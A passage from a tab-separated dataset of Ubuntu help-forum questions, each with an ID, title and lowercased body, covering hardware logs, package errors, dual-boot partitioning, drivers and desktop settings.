gbps ( sstatus 123 scontrol 300 ) [ 1.050845 ] ata5 : sata link up 6.0 gbps ( sstatus 133 scontrol 300 ) [ 1.050858 ] ata6 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 1.050871 ] ata2 : sata link up 6.0 gbps ( sstatus 133 scontrol 300 ) after some time ... `` all '' sata ports get hard reset link , speed drops from 6 gb/s to 3 gb/s to 1.5 gb/s [ 5939.483191 ] ata2 : exception emask 0x50 sact 0x0 serr 0x4090800 action 0xe frozen [ 5939.483202 ] ata2 : irq_stat 0x00400040 , connection status changed [ 5939.483211 ] ata2 : serror : { hostint phyrdychg 10b8b devexch } [ 5939.483223 ] ata2 : hard resetting link [ 5939.483243 ] ata1 : exception emask 0x50 sact 0x0 serr 0x4090800 action 0xe frozen [ 5939.483251 ] ata1 : irq_stat 0x00400040 , connection status changed [ 5939.483258 ] ata1 : serror : { hostint phyrdychg 10b8b devexch } [ 5939.483266 ] ata1 : hard resetting link [ 5939.483285 ] ata3 : exception emask 0x50 sact 0x0 serr 0x4090800 action 0xe frozen [ 5939.483294 ] ata3 : irq_stat 0x00400040 , connection status changed [ 5939.483300 ] ata3 : serror : { hostint phyrdychg 10b8b devexch } [ 5939.483308 ] ata3 : hard resetting link [ 5939.483328 ] ata5 : exception emask 0x50 sact 0x0 serr 0x4090800 action 0xe frozen [ 5939.483337 ] ata5 : irq_stat 0x00400040 , connection status changed [ 5939.483342 ] ata5 : serror : { hostint phyrdychg 10b8b devexch } [ 5939.483351 ] ata5 : hard resetting link [ 5939.483364 ] ata6 : exception emask 0x50 sact 0x0 serr 0x4090800 action 0xe frozen [ 5939.483367 ] ata6 : irq_stat 0x00400040 , connection status changed [ 5939.483371 ] ata6 : serror : { hostint phyrdychg 10b8b devexch } [ 5939.483377 ] ata6 : hard resetting link [ 5939.483396 ] ata4 : exception emask 0x50 sact 0x0 serr 0x4090800 action 0xe frozen [ 5939.483404 ] ata4 : irq_stat 0x00400040 , connection status changed [ 5939.483410 ] ata4 : serror : { hostint phyrdychg 10b8b devexch } [ 5939.483418 ] ata4 : hard resetting link [ 5940.204644 ] ata4 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) [ 5940.204682 ] ata3 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) [ 5940.204717 ] ata1 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) [ 5940.204746 ] ata6 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) [ 5940.204773 ] ata5 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) [ 5940.204802 ] ata2 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) [ 5940.206496 ] ata3.00 : acpi cmd ef/10:06:00:00:00:00 ( set features ) succeeded [ 5940.206506 ] ata3.00 : acpi cmd f5/00:00:00:00:00:00 ( security freeze lock ) filtered out [ 5940.206512 ] ata3.00 : acpi cmd b1/c1:00:00:00:00:00 ( device configuration overlay ) filtered out [ 5940.207247 ] ata5.00 : acpi cmd ef/10:06:00:00:00:00 ( set features ) succeeded [ 5940.207258 ] ata5.00 : acpi cmd f5/00:00:00:00:00:00 ( security freeze lock ) filtered out [ 5940.207264 ] ata5.00 : acpi cmd b1/c1:00:00:00:00:00 ( device configuration overlay ) filtered out [ 5940.208825 ] ata1.00 : configured for udma/33 [ 5940.208884 ] ata6.00 : acpi cmd ef/10:06:00:00:00:00 ( set features ) succeeded [ 5940.208894 ] ata6.00 : acpi cmd f5/00:00:00:00:00:00 ( security freeze lock ) filtered out [ 5940.208903 ] ata6.00 : acpi cmd b1/c1:00:00:00:00:00 ( device configuration overlay ) filtered out [ 5940.208922 ] ata1 : eh complete [ 5940.209502 ] ata2.00 : configured for udma/33 [ 5940.209540 ] ata3.00 : acpi cmd ef/10:06:00:00:00:00 ( set features ) succeeded [ 5940.209550 ] ata3.00 : acpi cmd f5/00:00:00:00:00:00 ( security freeze lock ) filtered out [ 5940.209556 ] ata3.00 : acpi cmd b1/c1:00:00:00:00:00 ( device configuration overlay ) filtered out [ 5940.209577 ] ata2 : eh complete [ 5940.209607 ] ata4.00 : configured for udma/33 [ 5940.209706 ] ata4 : eh complete [ 5940.209925 ] ata3.00 : configured for udma/33 [ 5940.209971 ] ata3 : eh complete [ 5940.211045 ] ata5.00 : acpi cmd ef/10:06:00:00:00:00 ( set features ) succeeded [ 5940.211053 ] ata5.00 : acpi cmd f5/00:00:00:00:00:00 ( security freeze lock ) filtered out [ 5940.211058 ] ata5.00 : acpi cmd b1/c1:00:00:00:00:00 ( device configuration overlay ) filtered out [ 5940.212018 ] ata5.00 : configured for udma/33 [ 5940.212093 ] ata5 : eh complete [ 5940.216540 ] ata6.00 : acpi cmd ef/10:06:00:00:00:00 ( set features ) succeeded [ 5940.216550 ] ata6.00 : acpi cmd f5/00:00:00:00:00:00 ( security freeze lock ) filtered out [ 5940.216556 ] ata6.00 : acpi cmd b1/c1:00:00:00:00:00 ( device configuration overlay ) filtered out [ 5940.219253 ] ata6.00 : configured for pio0 [ 5940.224814 ] ata6 : eh complete resources : irq:41 ioport : e000 ( size=4096 ) memory : e0000000-f00fffff resources : irq:50 memory : e0000000-efffffff memory : f0000000-f003ffff ioport : e000 ( size=256 ) memory : f0040000-f005ffff resources : irq:49 memory : f0060000-f0063fff resources : irq:42 memory : f0220000-f022ffff resources : irq:47 memory : f023a000-f023a00f resources : irq:19 ioport : f0a0 ( size=8 ) memory : f0238000-f0238fff resources : irq:43 memory : f0200000-f021ffff memory : f0237000-f0237fff ioport : f040 ( size=32 ) resources : irq:48 memory : f0230000-f0233fff resources : irq:16 ioport:2000 ( size=4096 ) memory : c0000000-c01fffff ioport : c0200000 ( size=2097152 ) resources : irq:16 ioport : d000 ( size=4096 ) memory : f0100000-f01fffff resources : irq:44 memory : f01a0000-f01bffff memory : f0180000-f019ffff ioport : d020 ( size=32 ) memory : f0160000-f017ffff resources : irq:46 memory : f0140000-f015ffff memory : f0120000-f013ffff ioport : d000 ( size=32 ) memory : f0100000-f011ffff resources : irq:0 resources : irq:45 ioport : f090 ( size=8 ) ioport : f080 ( size=4 ) ioport : f070 ( size=8 ) ioport : f060 ( size=4 ) ioport : f020 ( size=32 ) memory : f0236000-f02367ff *-pci:1 description : pci bridge product : 8 series/c220 series chipset family pci express root port # 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : d4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:16 ioport:2000 ( size=4096 ) memory : c0000000-c01fffff ioport : c0200000 ( size=2097152 ) *-pci:3 description : pci bridge product : 8 series/c220 series chipset family pci express root port # 5 vendor : intel corporation physical id : 1c.4 bus info : pci @ 0000:00:1c.4 version : d4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:16 ioport : d000 ( size=4096 ) memory : f0100000-f01fffff *-network:0 description : ethernet interface product : 82571eb gigabit ethernet controller vendor : intel corporation physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth1 version : 06 serial : 00:15:17 : b9:0c : df size : 1gbit/s capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=2.3.2-k duplex=full firmware=5.11-2 latency=0 link=yes multicast=yes port=twisted pair slave=yes speed=1gbit/s resources : irq:44 memory : f01a0000-f01bffff memory : f0180000-f019ffff ioport : d020 ( size=32 ) memory : f0160000-f017ffff *-network:1 description : ethernet interface product : 82571eb gigabit ethernet controller vendor : intel corporation physical id : 0.1 bus info : pci @ 0000:05:00.1 logical name : eth2 version : 06 serial : 00:15:17 : b9:0c : df size : 1gbit/s capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=2.3.2-k duplex=full firmware=5.11-2 latency=0 link=yes multicast=yes port=twisted pair slave=yes speed=1gbit/s resources : irq:46 memory : f0140000-f015ffff memory : f0120000-f013ffff ioport : d000 ( size=32 ) memory : f0100000-f011ffff 00:00.0 host bridge : intel corporation xeon e3-1200 v3 processor dram controller ( rev 06 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v3/4th gen core processor pci express x16 controller ( rev 06 ) 00:14.0 usb controller : intel corporation 8 series/c220 series chipset family usb xhci ( rev 04 ) 00:16.0 communication controller : intel corporation 8 series/c220 series chipset family mei controller # 1 ( rev 04 ) 00:16.3 serial controller : intel corporation 8 series/c220 series chipset family kt controller ( rev 04 ) 00:19.0 ethernet controller : intel corporation ethernet connection i217-v ( rev 04 ) 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 1 ( rev d4 ) 00:1c.3 pci bridge : intel corporation 82801 pci bridge ( rev d4 ) 00:1f.0 isa bridge : intel corporation h87 express lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 8 series/c220 series chipset family 6-port sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 8 series/c220 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] cape verde pro [ radeon hd 7750 ] 01:00.1 audio device : advanced micro devices , inc. [ amd/ati ] cape verde/pitcairn hdmi audio [ radeon hd 7700/7800 series ] 03:00.0 pci bridge : intel corporation 82801 pci bridge ( rev 41 ) 05:00.0 ethernet controller : intel corporation 82571eb gigabit ethernet controller ( rev 06 ) 05:00.1 ethernet controller : intel corporation 82571eb gigabit ethernet controller ( rev 06 ) any ideas to get the intel network card working without sata port speed drops ? tia , peter
399428	authentication error	i 've been using ubuntu 12.04 on my macbook pro and is really fine with it until i forgot the password . i tried the tips posted in the website but it only said , authentication token error or something like that . i 'm formatting my hard drive but ca n't because of that .
399431	how many nginx processes should there be ?	just installing nginx on a fresh ubuntu server 12.04. ps -e | grep nginx at first returned nothing so i ran nginxwhich appeared to get things started . running ps -e | grep nginx now returns a number of identical processes ? 1793 ? 00:00:00 nginx 1794 ? 00:00:00 nginx 1795 ? 00:00:00 nginx 1796 ? 00:00:00 nginx 1797 ? 00:00:00 nginx everything appears to be running , however i 'm interested to know why there are multiples , what they 're doing and what would happen to my server if i were to kill just one of them ?
399432	google.com requesting password ? ! is my router / firefox / computer infected ?	when i type `` google.com '' or `` http : //google.com '' into the address bar in firefox i end up with the following screen requesting some login and password . when i try the same in chrome or opera , i get redirected to www.google.com or www.google.pl . i killed dnsmasq and in /etc/hosts there 's nothing similar to google.com . when i press cancel , i get the following error 401 message . what is going on ? is it a virus ? but why is it active only for firefox ? any help will be highly appreciated ! i use an up-to-date ubuntu 12.04 with firefox 26.0 . update : i first noticed the problem , when i lost my internet connection ( i mean formally there was a connection , but there was no or hardly any transfer ) without any reason ( the first thing i did was typing google to check if it is a problem with a single domain or the whole connection ) . i just tried the same on another machine with similar configuration ( my current ubuntu was cloned from that a few months ago ) and everything is ok ...
399437	how to upgrade from 12.10 to 13.10 without official update for 13.10	i ca n't update the version to 13.10 because it does n't automatically show up , telling me to update in the software centre . there is no official update from ubuntu for 13.10 .
399438	how to solve `` dpkg : error : 1 expected program not found in path or not executable '' ?	i have installed the lamp server using the command sudo apt-get install lamp-server^ . thereafter , whenever i open the terminal the following error started to appear : bash : /home/gaja/.bashrccu : no such file or directory bash : /home/gaja/.bashrc : line 4 : syntax error near unexpected token ( ' bash : /home/gaja/.bashrc : line 4 : see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) ' i could get rid of this problem using the answer given here . however , now the problem is that i can not install any thing using the sudo apt-get command . i am trying to become root and then re-run the sudo apt-get install lamp-server^ command which gives the following error output : dpkg : warning : 'tar ' not found in path or not executable dpkg : error : 1 expected program not found in path or not executable note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin e : sub-process /usr/bin/dpkg returned an error code ( 2 ) following is the complete output of running the commands : gaja @ gaja-system-product-name : ~ $ sudo su [ sudo ] password for gaja : root @ gaja-system-product-name : /home/gaja # sudo apt-get install lamp-server^ reading package lists ... done building dependency tree reading state information ... done note , selecting 'libdbi-perl ' for task 'lamp-server' note , selecting 'perl-modules ' for task 'lamp-server' note , selecting 'libaprutil1-dbd-sqlite3 ' for task 'lamp-server' note , selecting 'perl ' for task 'lamp-server' note , selecting 'apache2-bin ' for task 'lamp-server' note , selecting 'libapache2-mod-php5 ' for task 'lamp-server' note , selecting 'ssl-cert ' for task 'lamp-server' note , selecting 'mysql-server-5.5 ' for task 'lamp-server' note , selecting 'mysql-client-core-5.5 ' for task 'lamp-server' note , selecting 'libclass-isa-perl ' for task 'lamp-server' note , selecting 'mysql-server ' for task 'lamp-server' note , selecting 'libapr1 ' for task 'lamp-server' note , selecting 'php5-readline ' for task 'lamp-server' note , selecting 'libaprutil1 ' for task 'lamp-server' note , selecting 'libwrap0 ' for task 'lamp-server' note , selecting 'libdbd-mysql-perl ' for task 'lamp-server' note , selecting 'apache2-mpm-prefork ' for task 'lamp-server' note , selecting 'libhtml-template-perl ' for task 'lamp-server' note , selecting 'mysql-client-5.5 ' for task 'lamp-server' note , selecting 'libaio1 ' for task 'lamp-server' note , selecting 'mysql-common ' for task 'lamp-server' note , selecting 'libmysqlclient18 ' for task 'lamp-server' note , selecting 'mysql-server-core-5.5 ' for task 'lamp-server' note , selecting 'libterm-readkey-perl ' for task 'lamp-server' note , selecting 'php5-mysql ' for task 'lamp-server' note , selecting 'apache2-data ' for task 'lamp-server' note , selecting 'apache2 ' for task 'lamp-server' note , selecting 'php5-common ' for task 'lamp-server' note , selecting 'php5-cli ' for task 'lamp-server' note , selecting 'libswitch-perl ' for task 'lamp-server' note , selecting 'libaprutil1-ldap ' for task 'lamp-server' note , selecting 'tcpd ' for task 'lamp-server' libaio1 is already the newest version . libapr1 is already the newest version . libaprutil1 is already the newest version . libaprutil1-dbd-sqlite3 is already the newest version . libaprutil1-ldap is already the newest version . libclass-isa-perl is already the newest version . libdbd-mysql-perl is already the newest version . libdbi-perl is already the newest version . libhtml-template-perl is already the newest version . libswitch-perl is already the newest version . libterm-readkey-perl is already the newest version . libwrap0 is already the newest version . perl is already the newest version . perl-modules is already the newest version . ssl-cert is already the newest version . tcpd is already the newest version . apache2 is already the newest version . apache2-bin is already the newest version . apache2-data is already the newest version . apache2-mpm-prefork is already the newest version . libapache2-mod-php5 is already the newest version . libmysqlclient18 is already the newest version . mysql-client-5.5 is already the newest version . mysql-client-core-5.5 is already the newest version . mysql-common is already the newest version . mysql-server is already the newest version . mysql-server-5.5 is already the newest version . mysql-server-core-5.5 is already the newest version . php5-cli is already the newest version . php5-common is already the newest version . php5-mysql is already the newest version . php5-readline is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 230 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : warning : 'tar ' not found in path or not executable dpkg : error : 1 expected program not found in path or not executable note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin e : sub-process /usr/bin/dpkg returned an error code ( 2 ) root @ gaja-system-product-name : /home/gaja # sudo apt-get install apache2 reading package lists ... done building dependency tree reading state information ... done apache2 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 230 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : warning : 'tar ' not found in path or not executable dpkg : error : 1 expected program not found in path or not executable note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin e : sub-process /usr/bin/dpkg returned an error code ( 2 ) root @ gaja-system-product-name : /home/gaja # some of the troubleshooting steps that i have taken on suggestion of other members : $ ls -l /bin/tar ls : can not access /bin/tar : no such file or directory $ apt-cache policy tar tar : installed : 1.26+dfsg-8 candidate : 1.26+dfsg-8 version table : *** 1.26+dfsg-8 0 500 in.archive.ubuntu.com/ubuntu saucy/main i386 packages 100 /var/lib/dpkg/status i have also tried running the following command after switching to root , but that does n't help either : export path=/usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games
399441	installing ubuntu 13.10 alongside windows 8.1	i have a dell inspiron 5520 ( 8gb ram , 1tb hdd ) and i have installed windows 8.1 x64 on it . i want to install ubuntu and dual boot windows 8.1 with ubuntu but i ca n't ( my problem is n't the dual booting process , which i can fix later using easybcd ) , ubuntu wo n't install . when i boot from the live cd i have no option to `` install ubuntu alongside windows 8 '' and when i choose `` something else ... '' it shows me my partitions which are all used by windows ( system reserved , reserved , etc.. ) and the one partition that i wanted to install ubuntu on is `` unusable '' . my disk is mbr and i think the problem is having more than 4 partitions . i created another local disk from inside windows but ubuntu just sees that drive and the drive i shrinked to make it as one partition . so , right now i want to install ubuntu without killing my windows ( if it 's possible ) . perhaps there is some way i can make an extended partition and use that but i do n't know how to ( i can shrink one of my drives but that would n't make a new partition would it ? ) . here is a screenshot of gparted in ubuntu : i do n't know why the 800 gb is unallocated , in windows , it is consisted of 2 drives ( i 've named them local disk e : \ and l : ) also , when i right-click on that 800 gb partition and click on `` new ... '' it gives me this error : which makes sense and is exactly what i 'm trying to do but i do n't know which partition i can remove so that my windows does n't break . also , i do n't know how to create an extended partition as i have n't done it before so i guess i would need help with that . edit : here 's a screenshot of the warning descriptions beside the partitions : for the ntfs partitions the description is the same apart from that last part which instead has written : the following list of software packages is required for ntfs file system support : ntfsprogs / ntfs-3g thank you !
399442	does choosing the `` replace windows 7 with ubuntu '' delete my drive data ?	quote from here : install ubuntu 12.04.3 lts | ubuntu allocate drive space use the checkboxes to choose whether you 'd like to install ubuntu alongside another operating system , delete your existing operating system and replace it with ubuntu , or â if you 're an advanced user â choose the 'something else ' option . question : does choosing the second option `` replace windows 7 with ubuntu '' delete my drive & drive data also , or does it only delete the c drive ?
399443	wrong desktop background after installing xfce along side with unity	i have ubuntu 13.10 and i 've installed xfce4 . after reboot and login with xfce session everything works great but desktop is from unity not xfce . if i go to applications menu- > settings - > desktop and change desktop background nothing happens . also if i press mid-button mouse on desktop the popup menu that appears is from unity and not from xfce
399444	zsh man page documentation missing in packages ?	i have a newly installed xubuntu 13.10 x64 . i decided to install zsh via synaptic and make it my default shell . the installed zsh 's version is : zsh 5.0.2 ( x86_64-pc-linux-gnu ) . the installed zsh looks ok , but there seems to be no man documentation for zsh . entering the command man zsh gives me this : no manual entry for zsh . i have also installed from synaptic , aside from zsh itself , zsh-lovers , zsh-doc , zsh-dbg . what did i miss in my zsh install to end up with zsh with no man documentation ?
399449	fonts skewed on top bar when using radiance	the fonts are weird to look at and are surrounded by fuzziness ( it 's hard to see on these pictures ) : when using the ambiance theme this does not occur : i 've tried messing with hinting options in ubuntu tweak . it would seem that , when using ambiance , everything except the top bar is not affected . all fonts change visibly when i move from `` maximum '' to `` no hinting '' and vice versa , but the fonts on the top bar appear to stay the same .
399450	can i have a virtual cd drive in lubuntu 13.10	i do n't have a cd drive in my computer and i use bootable pendrives to boot up my pc . now , my pen drive is lost so , can i have a bootable cd drive which can install operating systems like in oracle virtual box ?
399451	drivers for dvb-c dongle by empia technology inc .	i just bought a usb dvb-c dongle for which lsusb command returns eb1a:8179 empia technology , inc. has anybody ever come by such a device ? i need to install proper drivers . by the way , the vendor of the dongle does not support linux .
399456	install texlive-full in ubuntu 13.10 with texlive.iso installed	today i first installed the texlive by texlive.iso , but it is not as 'full ' as texlive-full . so i want to install texlive by sudo apt-get install texlive-full . what should i do before this reinstallation ? i typed sudo apt-get remove texlive* but almost nothing is removed .
399457	how do i make my window not semi transparent in xubuntu ?	for some reason , sometime a window would become semi transparent . it is really irritating because i ca n't focus on what i am doing . when i restart that program , when it launches it is not semi transparent anymore . i am using xubuntu 12.04 .
399458	out of memory when booting ubuntu or any linux distro from live usb	scenario : i had ubuntu 13.10 installed . tried to boot with a windows usb windows setup frozen after selecting `` delete '' on an empty ntfs partition restarted the laptop with power button now when i try to boot , it enters grub_rescue console . so , i made a live usb with ubuntu . i get this kind of errors when booting from live usb . i tried different linux distros ( manjaro , xubuntu ) on different usb drives , same issue , stuck on killing processes . also when i try to boot with a windows usb , it hangs at windows logo . ... edit after a while waiting to boot , it stucks on this kind of erros :
399459	hdmi audio support	does ubuntu / linux support audio over hdmi ? if generally yes , is there somewhere an overview on supported hardware . i am considering buying a new laptop to connect it with my tv . audio over hdmi would be required .
399460	creating usb with 3 partition fails	i followed this guide http : //www.ubuntu.com/download/help/create-a-usb-stick-on-mac-osx to create a bootable usb stick using os x mavericks . i created 3 partitions on the usb stick . i converted the .iso file to .dmg and copied it to one of the partitions with sudo dd . everything seemed to be working but when i start my mac i ca n't select the usb drive to boot from it . can anyone help me ?
399462	can not redirect subdomain apache2	i ca n't redirect a url to a subdomain . http.conf : # server name servername pony.localhost # document root documentroot /var/www/pony hosts : 127.0.1.1 chrubuntu 127.0.0.1 pony.localhost
399463	ubuntu freezes during installation	good morning people , i have a laptop in which i installed ubuntu and centos without problems some time ago . however , today i am trying to install ubuntu in my desktop computer but it is not possible . the installation freezes , the livecd can not execute . i 've been investigating and i noticed that the installation and livecd freeze when executing irqbalance . do you have any ideas in order for me to install linux in my desktop computer ? my desktop computer is : amd athlon 64 3200+ 2000mhz 2,5gb ram ati radeon x1650xt 256
399471	i could n't install ubuntu with `` something else '' option	the option install ubuntu alongside windows 7 is not listed ( i have 15gb free space in c drive ) . in the `` something else '' option there are 4 drives listed : 1mb drive for windows loader 100mb drive ( windows ) 30gb- c drive 45gb- else partitions . since there are 4 partitions , i can not install ubuntu ( i can not delete that 45gb since there are a lot of files in it ) . if i shrink the c drive to install ubuntu , even then i can not make a partition for ubuntu since there are 4 partitions . if i remove that 1mb drive ( which shows `` windows loader '' next to it ) and from the unallocated space i create 2 partitions ( swap and ext4 ) and install ubuntu , will this idea work ? ? please help me to install ubuntu . --
399476	are there specific file extensions that are n't compatible with ubuntu ?	i am using ubuntu version 12.04.2 lts are there any specific programs or file extensions that are not compatible with ubuntu ? can all .exe extensions be run on ubuntu ? i have just started using this os so my experience is next to nothing .
399477	reading package lists ... error	i 've installed ubuntu 13-10 yesterday and when i want to open software center i get this error : systemerror : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/ca.archive.ubuntu.com_ubuntu_dists_saucy_main_i18n_translation-en , e : the package lists or status file could not be parsed or opened . reading package lists ... error ! for solving this problem use this command : sudo rm /var/lib/apt/lists/* -vf sudo apt-get update and it takes long time to update , but steel i get that error when i want to open software center ! also when i want to install an application like squid , via apt-get is this error : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/ca.archive.ubuntu.com_ubuntu_dists_saucy_main_i18n_translation-en how can i solve this problem ?
399478	ubuntu 13.10 not booting when installed on a partion on my external usb 1tb drive plugged to a windows 8.1 laptop	i have ubuntu 13.10 installed on my hp laptop ( windows 8.1 ) running on an external usb seagate 1tb hard drive . i have installed ubuntu on my external usb drive using the iso file downloaded from ubuntu 's website and when i reboot my laptop i got the option screen of either running windows 8.1 off my hp laptop or ubuntu 13.10 from the usb drive . ubuntu does n't boot properly when i picked the ubuntu option from the dual boot menu ? any ideas ?
399479	unable to locate any i386 package	i 've been messing with my system for a while to get it work after upgrade and now it kind of works , but is not healthy . when i try to remove any i386 package on my 64-bit ubuntu 13.10 it returns an error : root # apt-get remove zlib1g : i386 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package zlib1g i know that it is installed from output of dpkg -l .
399488	ethernet port wo n't stay turned on	when i originally got internet service my ethernet port was not turned on . found this thread how do i install drivers for the atheros ar8161 ethernet controller ? , followed directions under answer 1 and it enabled my ethernet port . now , the problem is that every time i disconnect the ethernet cable or restart my computer , i have to go through the process all over again to enable my ethernet port . how do i make this change permanent so that my ethernet port remains on ? i 'm running xubuntu 12.04 64-bit .
399489	howto limit the amount of time ssh keys password are stored in a session ?	using raring , i see once i gave the password to the prompter , the key remains `` opened '' for use as long as the session remains opened . i feel this like a security concern , and i think i remember in some previous release of this feature i could set something at prompt time . is there a way in to limit , say for 1h , the time the password is available ? i thing the soft is gcr-prompter , but i see i have ssh-agent running in the background . thank you
399494	i am trying to make a mex file for octave but i am getting errors	octave-3.2.4:1 > mkoctfile -- mex myhello.c sh : 1 : /usr/bin/mkoctfile-3.2.4 : not found warning : unable to find mkoctfile in expected location : `/usr/bin/mkoctfile-3.2.4' warning : mkoctfile exited with failure status i have searched for mkoctfile and i found it in this path /usr/share/octave/3.2.4/m/miscellaneous/mkoctfile.m now please tell me what i should do to create mex file
399495	canon image runner 2420l on ubuntu	we are an indian government office and working on ubuntu . recently we purchased canon image runner 2420 printer which was not able to connect to the system , since there is no driver . can anybody solve the issue .
399496	share usb modem dongle internet over wifi	i am using a usb dongle ( tata photon+ and reliance netconnect ) for internet and i want to share it over wifi so that i can use it for my wifi tablet . i mean to turn my laptop into a hotspot so that i can use internet on my other devices . the option in network settings called use as a hotspot is not meant for a usb-modem and its not working . i am asking this because i ca n't find a working solution .
399497	sound disables completely when running qsynth ?	i 'm having a lot of trouble trying to set up my m-audio keystation mini 32 on my ubuntu . i 've read many articles on setting up jack and then setting up qsynth . when launching qsynth , my audio device just stops working all together . i reboot ubuntu to get my sounds back on , but i still have a misfunctioning midi keyboard . any advice ?
399498	ubuntu 12.04 geforce 520m and bumblebee	i am totally new to linux . so well after following different tutorials and how to 's i am about to delete ubuntu and start using windows again . i just ca n't make my graphic drivers work properly with bumblebee . my machine is an acer laptop with 2nd gen. i5 and a geforce gt520m . well i 've been trying different nvidia drivers so far and different versions of bumblebee . but i always end up with the same error : [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) no devices detected of course i 've tried the solutions mentioned on the bumblebees ' official site as well as other options from this forum . well i know there are dozens of answers to this error , i think i 've nearly tried them all and nothing works for me . or maybe it is that simple that i just do n't understand the whole thing . either way , i 'm needing help or i 'll throw my laptop through the window soon . let me know what further info i should provide ... thanks a lot so just to add some information : i have tried to change the bus id manually at `` xorg.conf.nvidia '' i have changed the driver names at `` bumblebee.conf '' my current drivers are as follows jaust @ tragcomputer : ~ $ dpkg -l nvidia-\* | grep '^ii' ii nvidia-304 304.117-0ubuntu1~xedgers~precise3 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-current 304.117-0ubuntu1~xedgers~precise3 transitional package for nvidia-current ii nvidia-libopencl1-304 304.117-0ubuntu1~xedgers~precise3 nvidia opencl driver and icd loader library ii nvidia-opencl-icd-304 304.117-0ubuntu1~xedgers~precise3 nvidia opencl icd ii nvidia-settings 331.20-0ubuntu6~xedgers~precise1 tool for configuring the nvidia graphics driver
399499	any way to extract the current subtitle line from mplayer	is there any way to copy the current subtitle line to the clipboard or direct it into a different app ? for example , while mplayer is paused extract the line that is currently on the frame and send it into goldendict . a method that takes minimum actions , a shortcut key , for instance , would be great or selecting subtitles on the screen with a mouse . any ideas ?
399501	ubuntu 13.10 64bit installation problems with hp elitebook 8540w	i have tried both 32bit and 64bit versions of ubuntu 13.10 and 12.04 lts and allways the same screen pops on ! and i tried it with cd and usb . for burning cd i used poweriso . for usb i used poweriso and universal-usb-installer-1.9.5.1 . this is the screen that pops up when trying to install - i 'm using hp elitebook 8540w intel core 2 i5-520m nvidia quadro fx 1800m currently using windows 8.1
399502	unable to mount external hard drive . ntfs signature missing	i 'm having trouble mounting my external hdd . well i do manage to mount it but the thing is that it does n't work except after running the command sudo f-disk -l and waiting for it about 5 minutes to finish ! every time i need mount the hard disk i have to wait 5 minutes ! ! this is really really bugging me . i caught the above error message ! ! it has never appeared before ! maybe it 's what can help me with my issue ! ! what about the `` ntfs signature '' ? ? is that it ? by the way i 've already asked 2 questions about this hard disk before i 'll paste them here . you can look them up if you want . ubuntu does n't `` see '' external usb hard disk that was when i did n't know how to mount it in the first place . it has more description . and this one : alternative ways of mounting usb ntfs external-hdd
399504	query regarding installation	am new user for ubuntu , i have decided to remove my windows xp and install ubuntu . i found the latest version ubuntu 13.10 and downloaded the iso image . please know weather i can install directly 13.10 iso image ( ubuntu-13.10-desktop-amd64 ) with the cd .
399506	32bit program on 64bit ubuntu fails when using linux 32 before setup.sh	when i try to install a 32 bit program on ubuntu 13.10 64bit it falis . my command is as follow : linux32 ./setup.sh output is : the setup program seems to have failed on x86/unknown fatal error , no tech support email configured in this setup is there a way to install 32bit program on ubuntu 13.10 ? when running the following command : ./setup.sh the output is as below : the setup program seems to have failed on amd64/unknown fatal error , no tech support email configured in this setup
399510	black screen on ubuntu 10.13 with vb 4.3.6 after install	every time i try to start my vm in virtualbox , i just get a black screen . sometimes , i get to the login screen , where it asks me to choose a user . but after that screen , all i ever get is a black screen and some ubuntu errors . my host machine is windows 7 64 bit . please help , i have been trying to get this to work for 20 hours now .
399511	problem in driver after installation of ubuntu 12.04	i have installed ubuntu 12.04 but now i am not been able to use my wifi and volume control and it is also showing gnome setting demon not responding . what should i do.. ? ? ? please help me . thank you in advance .
399513	keyboard short cut for switching between two or more instances of the same application ?	i 'm wondering if there is a keyboard short cut for examining and switching between multiple windows of the same application ? i know of alt + tab but that only shows different applications .
